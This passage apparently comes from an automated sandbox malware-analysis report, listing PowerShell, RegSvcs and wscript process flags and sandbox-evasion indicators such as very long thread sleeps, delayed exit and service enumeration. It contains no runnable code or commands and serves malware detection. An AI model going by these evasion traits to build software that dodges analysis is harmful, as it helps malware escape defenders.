                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Delayed program exit found
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040F7A7 Sleep,ExitProcess,27_2_0040F7A7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,27_2_0041A748
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1918Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1080Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4631Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4465Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6061Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3448Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1353Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1767
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 415Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9198Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: foregroundWindowGot 1756Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2367Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 948Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 603
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 490
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2179
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 692
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3080
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 816
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 751
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 710
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 904
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 372
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1091
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1178
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2329
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 628
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3663
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3006
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 381
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 984
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 6.1 %
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7032Thread sleep count: 4631 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7012Thread sleep count: 4465 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1544Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6972Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3084Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3140Thread sleep count: 6061 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3140Thread sleep count: 3448 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480Thread sleep count: 1353 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6472Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6420Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7056Thread sleep count: 1767 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6428Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 344Thread sleep count: 2367 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6980Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7004Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep count: 603 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 133 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 490 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep count: 2179 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep time: -4611686018427385s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep count: 692 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep count: 3080 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5104Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep count: 816 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3548Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep count: 751 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4348Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496Thread sleep count: 710 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2936Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep count: 904 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4464Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1104Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488Thread sleep count: 1091 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep count: 1178 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep count: 2329 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep count: 628 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2792Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1272Thread sleep count: 3663 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6464Thread sleep time: -20291418481080494s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136Thread sleep count: 3006 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6260Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3852Thread sleep count: 381 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7360Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6272Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1448Thread sleep count: 984 > 30
